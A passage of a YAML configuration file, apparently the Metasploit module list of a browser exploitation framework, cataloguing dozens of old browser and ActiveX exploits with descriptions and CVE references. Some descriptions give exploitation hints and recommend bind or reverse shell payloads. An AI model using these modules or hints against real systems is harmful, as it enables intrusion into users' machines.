\t\t\t\tbyte stack buffer and overwrite some local variables as well as the saved\n\
\t\t\t\treturn address.\n\n\
\t\t\t\tNOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n\
\t\t\t\tDue to this, only characters which have a valid localized multibyte\n\
\t\t\t\trepresentation are allowed. Invalid characters will be replaced with\n\
\t\t\t\tquestion marks ('?').\n\n\
\t\t\t\tThis vulnerability was originally discovered independently by both Stephen\n\
\t\t\t\tFewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n\
\t\t\t\tbeen done, all versions since version 6 Update 10 are believed to be affected\n\
\t\t\t\tby this vulnerability.\n\n\
\t\t\t\tThis vulnerability was patched as part of the October 2010 Oracle Patch\n\
\t\t\t\trelease.\n\
\t\t\t"
authors:
- - CVE
- 2010-3552
- - OSVDB
- "68873"
- - BID
- "44023"
- - URL
- http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-206/
- - URL
- http://code.google.com/p/skylined/issues/detail?id=23
- - URL
- http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/
- - URL
- http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
path: extensions/metasploit/
class: Msf_module
msf_adobe_flashplayer_avm:
enable: true
msf: true
msf_key: windows/browser/adobe_flashplayer_avm
name: Adobe Flash Player AVM Bytecode Verification Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33\n\
\t\t\t\tand earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification\n\
\t\t\t\tlogic. This results in unsafe JIT(Just-In-Time) code being executed.\n\n\
\t\t\t\t\tSpecifically, this issue results in uninitialized memory being referenced and later \n\
\t\t\t\texecuted. Taking advantage of this issue relies on heap spraying and controlling the\n\
\t\t\t\tuninitialized memory. \n\n\
\t\t\t\t\tCurrently this exploit works for IE6, IE7, and Firefox 3.6 and likely several \n\
\t\t\t\tother browsers. DEP does catch the exploit and causes it to fail. Due to the nature\n\
\t\t\t\tof the uninitialized memory its fairly difficult to get around this restriction.\n\
\t\t\t\t"
authors:
- - CVE
- 2011-0609
- - OSVDB
- "71254"
- - URL
- http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html
- - URL
- http://www.adobe.com/devnet/swf.html
- - URL
- http://www.adobe.com/support/security/advisories/apsa11-01.html
path: extensions/metasploit/
class: Msf_module
msf_adobe_jbig2decode:
enable: true
msf: true
msf_key: windows/fileformat/adobe_jbig2decode
name: Adobe JBIG2Decode Memory Corruption Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n\
\t\t\t\t\tThis module relies upon javascript for the heap spray.\n\
\t\t\t"
authors:
- - CVE
- 2009-0658
- - OSVDB
- "52073"
- - URL
- http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html
path: extensions/metasploit/
class: Msf_module
msf_windvd7_applicationtype:
enable: true
msf: true
msf_key: windows/browser/windvd7_applicationtype
name: WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n\
\t\t\t\tcontrol in InterVideo WinDVD 7. By sending a overly long string\n\
\t\t\t\tto the \"ApplicationType()\" property, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-0348
- - OSVDB
- "34315"
- - BID
- "23071"
path: extensions/metasploit/
class: Msf_module
msf_ms06_071_xml_core:
enable: true
msf: true
msf_key: windows/browser/ms06_071_xml_core
name: Internet Explorer XML Core Services HTTP Request Handling
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft XML Core Services which\n\
\t\t\t\texists in the XMLHTTP ActiveX control. This module is the modifed version of\n\
\t\t\t\thttp://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully\n\
\t\t\t\ttested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6\n\
\t\t\t\t+ Microsoft XML Core Services 4.0 SP2.\n\
\t\t\t"
authors:
- - CVE
- 2006-5745
- - OSVDB
- "29425"
- - MSB
- MS06-071
- - BID
- "20915"
path: extensions/metasploit/
class: Msf_module
msf_juniper_sslvpn_ive_setupdll:
enable: true
msf: true
msf_key: windows/browser/juniper_sslvpn_ive_setupdll
name: Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n\
\t\t\t\tlibrary which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n\
\t\t\t\tas part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n\
\t\t\t\toverly long string to the ProductName object parameter, the stack\n\
\t\t\t\tis overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2006-2086
- - OSVDB
- "25001"
- - BID
- "17712"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html
path: extensions/metasploit/
class: Msf_module
msf_apple_itunes_playlist:
enable: true
msf: true
msf_key: windows/browser/apple_itunes_playlist
name: Apple ITunes 4.7 Playlist Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Apple ITunes 4.7\n\
\t\t\t\tbuild 4.7.0.42. By creating a URL link to a malicious PLS\n\
\t\t\t\tfile, a remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code. When using this module, be sure to set the\n\
\t\t\t\tURIPATH with an extension of '.pls'.\n\
\t\t\t"
authors:
- - CVE
- 2005-0043
- - OSVDB
- "12833"
- - BID
- "12238"
path: extensions/metasploit/
class: Msf_module
msf_tumbleweed_filetransfer:
enable: true
msf: true
msf_key: windows/browser/tumbleweed_filetransfer
name: Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the vcst_eu.dll\n\
\t\t\t\tFileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n\
\t\t\t\tSecureTransport suite. By sending an overly long string to the\n\
\t\t\t\tTransferFile() 'remotefile' function, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-1724
- - OSVDB
- "44252"
- - URL
- http://www.aushack.com/200708-tumbleweed.txt
path: extensions/metasploit/
class: Msf_module
msf_ms10_046_shortcut_icon_dllloader:
enable: true
msf: true
msf_key: windows/browser/ms10_046_shortcut_icon_dllloader
name: Microsoft Windows Shell LNK Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the handling of Windows\n\
\t\t\t\tShortcut files (.LNK) that contain an icon resource pointing to a\n\
\t\t\t\tmalicious DLL. This module creates a WebDAV service that can be used\n\
\t\t\t\tto run an arbitrary payload when accessed as a UNC path.\n\
\t\t\t"
authors:
- - CVE
- 2010-2568
- - OSVDB
- "66387"
- - MSB
- MS10-046
- - URL
- http://www.microsoft.com/technet/security/advisory/2286198.mspx
path: extensions/metasploit/
class: Msf_module
msf_mcafeevisualtrace_tracetarget:
enable: true
msf: true
msf_key: windows/browser/mcafeevisualtrace_tracetarget
name: McAfee Visual Trace ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n\
\t\t\t\tControl (NeoTraceExplorer.dll 1.0.0.1). By sending a overly long string to the\n\
\t\t\t\t\"TraceTarget()\" method, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-6707
- - OSVDB
- "32399"
- - URL
- http://secunia.com/advisories/23463
path: extensions/metasploit/
class: Msf_module
msf_orbit_connecting:
enable: true
msf: true
msf_key: windows/browser/orbit_connecting
name: Orbit Downloader Connecting Log Creation Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an\n\
\t\t\t\tattacker serves up a malicious web site, abritrary code may be executed.\n\
\t\t\t\tThe PAYLOAD windows/shell_bind_tcp works best.\n\
\t\t\t"
authors:
- - CVE
- 2009-0187
- - OSVDB
- "52294"
- - BID
- "33894"
path: extensions/metasploit/
class: Msf_module
msf_kazaa_altnet_heap:
enable: true
msf: true
msf_key: windows/browser/kazaa_altnet_heap
name: Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n\
\t\t\t\tControl (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n\
\t\t\t\tBy sending a overly long string to the \"Install()\" method, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5217
- - OSVDB
- "37785"
- - URL
- http://secunia.com/advisories/26970/
path: extensions/metasploit/
class: Msf_module
msf_ms08_041_snapshotviewer:
enable: true
msf: true
msf_key: windows/browser/ms08_041_snapshotviewer
name: Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\n\
\t\t\t\tvia the Microsoft Office Snapshot Viewer ActiveX Control.\n\
\t\t\t"
authors:
- - CVE
- 2008-2463
- - OSVDB
- "46749"
- - MSB
- MS08-041
- - BID
- "30114"
path: extensions/metasploit/
class: Msf_module
msf_java_codebase_trust:
enable: true
msf: true
msf_key: windows/browser/java_codebase_trust
name: Sun Java Applet2ClassLoader Remote Code Execution Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Java Runtime Environment\n\
\t\t\t\tthat allows an attacker to run an applet outside of the Java Sandbox. When\n\
\t\t\t\tan applet is invoked with:\n\n\
\t\t\t\t1. A \"codebase\" parameter that points at a trusted directory\n\
\t\t\t\t2. A \"code\" parameter that is a URL that does not contain any dots\n\n\
\t\t\t\tthe applet will run outside of the sandbox.\n\n\
\t\t\t\tThis vulnerability affects JRE prior to version 6 update 24.\n\
\t\t\t"
authors:
- - CVE
- 2010-4452
- - OSVDB
- "71193"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-084/
- - URL
- http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/
- - URL
- http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html
path: extensions/metasploit/
class: Msf_module
msf_awingsoft_web3d_bof:
enable: true
msf: true
msf_key: windows/browser/awingsoft_web3d_bof
name: AwingSoft Winds3D Player SceneURL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a data segment buffer overflow within Winds3D Viewer of\n\
\t\t\t\tAwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of\n\
\t\t\t\tAwingSoft Web3D Player.\n\
\t\t\t\tBy setting an overly long value to the 'SceneURL' property, an attacker can\n\
\t\t\t\toverrun a buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-4588
- - OSVDB
- "60017"
- - URL
- http://www.milw0rm.com/exploits/9116
- - URL
- http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt
- - URL
- http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/
path: extensions/metasploit/
class: Msf_module
msf_aim_goaway:
enable: true
msf: true
msf_key: windows/browser/aim_goaway
name: AOL Instant Messenger goaway Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the handling of AOL Instant\n\
\t\t\t\tMessenger's 'goaway' URI handler. An attacker can execute\n\
\t\t\t\tarbitrary code by supplying a overly sized buffer as the\n\
\t\t\t\t'message' parameter. This issue is known to affect AOL Instant\n\
\t\t\t\tMessenger 5.5.\n\
\t\t\t"
authors:
- - CVE
- 2004-0636
- - OSVDB
- "8398"
- - BID
- "10889"
- - URL
- http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_autodesk_idrop:
enable: true
msf: true
msf_key: windows/browser/autodesk_idrop
name: Autodesk IDrop ActiveX Control Heap Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap-based memory corruption vulnerability in\n\
\t\t\t\tAutodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.\n\
\t\t\t\tAn attacker can execute arbitrary code by triggering a heap use after\n\
\t\t\t\tfree condition using the Src, Background, PackageXml properties.\n\
\t\t\t"
authors:
- - OSVDB
- "53265"
- - BID
- "34352"
- - URL
- http://www.milw0rm.com/exploits/8560
- - URL
- http://marc.info/?l=full-disclosure&m=123870112214736
path: extensions/metasploit/
class: Msf_module
msf_aol_icq_downloadagent:
enable: true
msf: true
msf_key: windows/browser/aol_icq_downloadagent
name: America Online ICQ ActiveX Control Arbitrary File Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to download and execute arbitrary files\n\
\t\t\t\ton a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.\n\
\t\t\t"
authors:
- - CVE
- 2006-5650
- - OSVDB
- "30220"
- - BID
- "20930"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-06-037/
path: extensions/metasploit/
class: Msf_module
msf_aventail_epi_activex:
enable: true
msf: true
msf_key: windows/browser/aventail_epi_activex
name: SonicWALL Aventail epi.dll AuthCredential Format String Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability within version 10.0.4.x and\n\
\t\t\t\t10.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX\n\
\t\t\t\tcontrol (epi.dll). By calling the 'AuthCredential' method with a specially\n\
\t\t\t\tcrafted Unicode format string, an attacker can cause memory corruption and\n\
\t\t\t\texecute arbitrary code.\n\n\
\t\t\t\tUnfortunately, it does not appear to be possible to indirectly re-use existing\n\
\t\t\t\tstack data for more reliable exploitation. This is due to several particulars\n\
\t\t\t\tabout this vulnerability. First, the format string must be a Unicode string,\n\
\t\t\t\twhich uses two bytes per character. Second, the buffer is allocated on the\n\
\t\t\t\tstack using the 'alloca' function. As such, each additional format specifier (%x)\n\
\t\t\t\twill add four more bytes to the size allocated. This results in the inability to\n\
\t\t\t\tmove the read pointer outside of the buffer.\n\n\
\t\t\t\tFurther testing showed that using specifiers that pop more than four bytes does\n\
\t\t\t\tnot help. Any number of format specifiers will result in accessing the same value\n\
\t\t\t\twithin the buffer.\n\n\
\t\t\t\tNOTE: It may be possible to leverage the vulnerability to leak memory contents.\n\
\t\t\t\tHowever, that has not been fully investigated at this time.\n\
\t\t\t"
authors:
- - OSVDB
- "67286"
- - URL
- http://sotiriu.de/adv/NSOADV-2010-005.txt
path: extensions/metasploit/
class: Msf_module
msf_hp_loadrunner_addfile:
enable: true
msf: true
msf_key: windows/browser/hp_loadrunner_addfile
name: Persits XUpload ActiveX AddFile Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Persits Software Inc's\n\
\t\t\t\tXUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5.\n\
\t\t\t\tBy passing an overly long string to the AddFile method, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0492
- - OSVDB
- "40762"
- - BID
- "27456"
- - URL
- http://www.milw0rm.com/exploits/4987
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_datetime:
enable: true
msf: true
msf_key: windows/browser/novelliprint_datetime
name: Novell iPrint Client ActiveX Control Date/Time Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n\
\t\t\t\tpassing a specially crafted date/time string via certain parameters to ienipp.ocx\n\
\t\t\t\tan attacker can execute arbitrary code.\n\n\
\t\t\t\tNOTE: The \"operation\" variable must be set to a valid command in order to reach this\n\
\t\t\t\tvulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2009-1569
- - BID
- "37242"
- - OSVDB
- "60804"
- - URL
- http://secunia.com/advisories/35004/
path: extensions/metasploit/
class: Msf_module
msf_zenturiprogramchecker_unsafe:
enable: true
msf: true
msf_key: windows/browser/zenturiprogramchecker_unsafe
name: Zenturi ProgramChecker ActiveX Control Arbitrary File Download
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\n\
\t\t\t\tvia the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.\n\
\t\t\t"
authors:
- - CVE
- 2007-2987
- - OSVDB
- "36715"
- - BID
- "24217"
path: extensions/metasploit/
class: Msf_module
msf_realplayer_cdda_uri:
enable: true
msf: true
msf_key: windows/browser/realplayer_cdda_uri
name: RealNetworks RealPlayer CDDA URI Initialization Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a initialization flaw within RealPlayer 11/11.1 and \n\
\t\t\t\tRealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object \n\
\t\t\t\tinitialization failure. However, this failure is improperly handled and \n\
\t\t\t\tuninitialized memory executed.\n\
\t\t\t"
authors:
- - CVE
- 2010-3747
- - OSVDB
- "68673"
- - BID
- "44144"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-210/
- - URL
- http://service.real.com/realplayer/security/10152010_player/en/
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_target_frame:
enable: true
msf: true
msf_key: windows/browser/novelliprint_target_frame
name: Novell iPrint Client ActiveX Control target-frame Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n\
\t\t\t\tpassing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n\
\t\t\t\tan attacker can execute arbitrary code.\n\n\
\t\t\t\tNOTE: The \"operation\" variable must be set to a valid command in order to reach this\n\
\t\t\t\tvulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2009-1568
- - BID
- "37242"
- - OSVDB
- "60803"
- - URL
- http://secunia.com/advisories/37169/
path: extensions/metasploit/
class: Msf_module
msf_roxio_cineplayer:
enable: true
msf: true
msf_key: windows/browser/roxio_cineplayer
name: Roxio CinePlayer ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n\
\t\t\t\tcontrol (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n\
\t\t\t\tBy setting an overly long value to 'DiskType', an attacker can overrun\n\
\t\t\t\ta buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1559
- - OSVDB
- "34779"
- - BID
- "23412"
path: extensions/metasploit/
class: Msf_module
msf_dxstudio_player_exec:
enable: true
msf: true
msf_key: windows/browser/dxstudio_player_exec
name: Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerability within the\n\
\t\t\t\tDX Studio Player from Worldweaver. The player is a browser plugin for\n\
\t\t\t\tIE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web\n\
\t\t\t\tpage referring to a specially crafted .dxstudio document, an attacker can\n\
\t\t\t\texecute arbitrary commands.\n\n\
\t\t\t\tTesting was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and\n\
\t\t\t\tIE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow\n\
\t\t\t\tthe plug-in to access local files. This prompt appears to occur only once per\n\
\t\t\t\tserver host.\n\n\
\t\t\t\tNOTE: This exploit uses additionally dangerous script features to write to\n\
\t\t\t\tlocal files!\n\
\t\t\t"
authors:
- - CVE
- 2009-2011
- - BID
- "35273"
- - OSVDB
- "54969"
- - URL
- http://www.exploit-db.com/exploits/8922
- - URL
- http://dxstudio.com/guide.aspx
path: extensions/metasploit/
class: Msf_module
msf_realplayer_smil:
enable: true
msf: true
msf_key: windows/browser/realplayer_smil
name: RealNetworks RealPlayer SMIL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n\
\t\t\t\tBy creating a URL link to a malicious SMIL file, a remote attacker could\n\
\t\t\t\toverflow a buffer and execute arbitrary code.\n\
\t\t\t\tWhen using this module, be sure to set the URIPATH with an extension of '.smil'.\n\
\t\t\t\tThis module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n\
\t\t\t\tbuild 6.0.9.584.\n\
\t\t\t"
authors:
- - CVE
- 2005-0455
- - OSVDB
- "14305"
- - BID
- "12698"
path: extensions/metasploit/
class: Msf_module
msf_java_ws_arginject_altjvm:
enable: true
msf: true
msf_key: windows/browser/java_ws_arginject_altjvm
name: Sun Java Web Start Plugin Command Line Argument Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the Web Start plugin component of Sun Java\n\
\t\t\t\tWeb Start. The arguments passed to Java Web Start are not properly validated.\n\
\t\t\t\tBy passing the lesser known -J option, an attacker can pass arbitrary options\n\
\t\t\t\tdirectly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n\
\t\t\t\tby Ruben Santamarta, an attacker can execute arbitrary code in the context of\n\
\t\t\t\tan unsuspecting browser user.\n\n\
\t\t\t\tThis vulnerability was originally discovered independently by both Ruben\n\
\t\t\t\tSantamarta and Tavis Ormandy. Tavis reported that all versions since version\n\
\t\t\t\t6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n\
\t\t\t\tIn order for this module to work, it must be ran as root on a server that\n\
\t\t\t\tdoes not serve SMB. Additionally, the target host must have the WebClient\n\
\t\t\t\tservice (WebDAV Mini-Redirector) enabled.\n\
\t\t\t"
authors:
- - CVE
- 2010-0886
- - OSVDB
- "63648"
- - BID
- "39346"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html
- - URL
- http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1
path: extensions/metasploit/
class: Msf_module
msf_adobe_flashplayer_flash10o:
enable: true
msf: true
msf_key: windows/browser/adobe_flashplayer_flash10o
name: Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player that was discovered, and\n\
\t\t\t\thas been exploited actively in the wild. By embedding a specially crafted .swf file,\n\
\t\t\t\tAdobe Flash crashes due to an invalid use of an object type, which allows attackers to\n\
\t\t\t\toverwrite a pointer in memory, and results arbitrary code execution.\n\
\t\t\t"
authors:
- - CVE
- 2011-0611
- - OSVDB
- "71686"
- - BID
- "47314"
- - URL
- http://www.adobe.com/support/security/bulletins/apsb11-07.html
- - URL
- http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx
- - URL
- http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html
- - URL
- http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html
- - URL
- http://secunia.com/blog/210
path: extensions/metasploit/
class: Msf_module
msf_ms06_067_keyframe:
enable: true
msf: true
msf_key: windows/browser/ms06_067_keyframe
name: Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a heap overflow vulnerability in the KeyFrame method of the\n\
\t\t\t\tdirect animation ActiveX control. This is a port of the exploit implemented by\n\
\t\t\t\tAlexander Sotirov.\n\
\t\t\t"
authors:
- - CVE
- 2006-4777
- - OSVDB
- "28842"
- - BID
- "20047"
- - MSB
- MS06-067
- - URL
- https://www.blackhat.com/presentations/bh-eu-07/Sotirov/Sotirov-Source-Code.zip
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_officescan:
enable: true
msf: true
msf_key: windows/http/trendmicro_officescan
name: Trend Micro OfficeScan Remote Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Trend Micro OfficeScan\n\
\t\t\t\tcgiChkMasterPwd.exe (running with SYSTEM privileges).\n\
\t\t\t"
authors:
- - CVE
- 2008-1365
- - OSVDB
- "42499"
path: extensions/metasploit/
class: Msf_module
msf_ms11_050_mshtml_cobjectelement:
enable: true
msf: true
msf_key: windows/browser/ms11_050_mshtml_cobjectelement
name: MS11-050 IE mshtml!CObjectElement Use After Free
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a use-after-free vulnerability in Internet Explorer. The\n\
\t\t\t\tvulnerability occurs when an invalid <object> tag exists and other elements\n\
\t\t\t\toverlap/cover where the object tag should be when rendered (due to their\n\
\t\t\t\tstyles/positioning). The mshtml!CObjectElement is then freed from memory because\n\
\t\t\t\tit is invalid. However, the mshtml!CDisplay object for the page continues to keep\n\
\t\t\t\ta reference to the freed <object> and attempts to call a function on it, leading\n\
\t\t\t\tto the use-after-free.\n\n\
\t\t\t\tPlease note that for IE 8 targets, JRE (Java Runtime Environment) is required to\n\
\t\t\t\tbypass DEP.\n\
\t\t\t"
authors:
- - CVE
- 2011-1260
- - OSVDB
- "72950"
- - MSB
- MS11-050
- - URL
- http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html
path: extensions/metasploit/
class: Msf_module
msf_barcode_ax49:
enable: true
msf: true
msf_key: windows/browser/barcode_ax49
name: RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in RKD Software Barcode Application\n\
\t\t\t\tActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint\n\
\t\t\t\tmethod of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - URL
- http://www.milw0rm.com/exploits/4094
- - OSVDB
- "37482"
- - BID
- "24596"
- - CVE
- 2007-3435
path: extensions/metasploit/
class: Msf_module
msf_yahoomessenger_server:
enable: true
msf: true
msf_key: windows/browser/yahoomessenger_server
name: Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n\
\t\t\t\tControl (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.\n\
\t\t\t\tBy sending a overly long string to the \"Server()\" method, and then calling\n\
\t\t\t\tthe \"Send()\" method, an attacker may be able to execute arbitrary code.\n\
\t\t\t\tUsing the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n\
\t\t\t\tyield for the best results.\n\
\t\t\t"
authors:
- - CVE
- 2007-3147
- - OSVDB
- "37082"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html
path: extensions/metasploit/
class: Msf_module
msf_winzip_fileview:
enable: true
msf: true
msf_key: windows/browser/winzip_fileview
name: WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n\
\t\t\t\tremote attacker to execute arbitrary code on the system. The control contains\n\
\t\t\t\tseveral unsafe methods and is marked safe for scripting and safe for initialization.\n\
\t\t\t\tA remote attacker could exploit this vulnerability to execute arbitrary code on the\n\
\t\t\t\tvictim system. WinZip 10.0 <= Build 6667 are vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2006-5198
- - OSVDB
- "30433"
- - BID
- "21060"
path: extensions/metasploit/
class: Msf_module
msf_chilkat_crypt_writefile:
enable: true
msf: true
msf_key: windows/browser/chilkat_crypt_writefile
name: Chilkat Crypt ActiveX WriteFile Unsafe Method
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows attackers to execute code via the 'WriteFile' unsafe method of\n\
\t\t\t\tChilkat Software Inc's Crypt ActiveX control.\n\n\
\t\t\t\tThis exploit is based on shinnai's exploit that uses an hcp:// protocol URI to\n\
\t\t\t\texecute our payload immediately. However, this method requires that the victim user\n\
\t\t\t\tbe browsing with Administrator. Additionally, this method will not work on newer\n\
\t\t\t\tversions of Windows.\n\n\
\t\t\t\tNOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at\n\
\t\t\t\tthe time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.\n\
\t\t\t"
authors:
- - CVE
- 2008-5002
- - OSVDB
- "49510"
- - BID
- "32073"
- - URL
- http://www.exploit-db.com/exploits/6963
path: extensions/metasploit/
class: Msf_module
msf_ms10_018_ie_behaviors:
enable: true
msf: true
msf_key: windows/browser/ms10_018_ie_behaviors
name: Internet Explorer DHTML Behaviors Use After Free
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a use-after-free vulnerability within the DHTML behaviors\n\
\t\t\t\tfunctionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n\
\t\t\t\tdiscovered being used in-the-wild and was previously known as the \"iepeers\"\n\
\t\t\t\tvulnerability. The name comes from Microsoft's suggested workaround to block\n\
\t\t\t\taccess to the iepeers.dll file.\n\n\
\t\t\t\tAccording to Nico Waisman, \"The bug itself is when trying to persist an object\n\
\t\t\t\tusing the setAttribute, which end up calling VariantChangeTypeEx with both the\n\
\t\t\t\tsource and the destination being the same variant. So if you send as a variant\n\
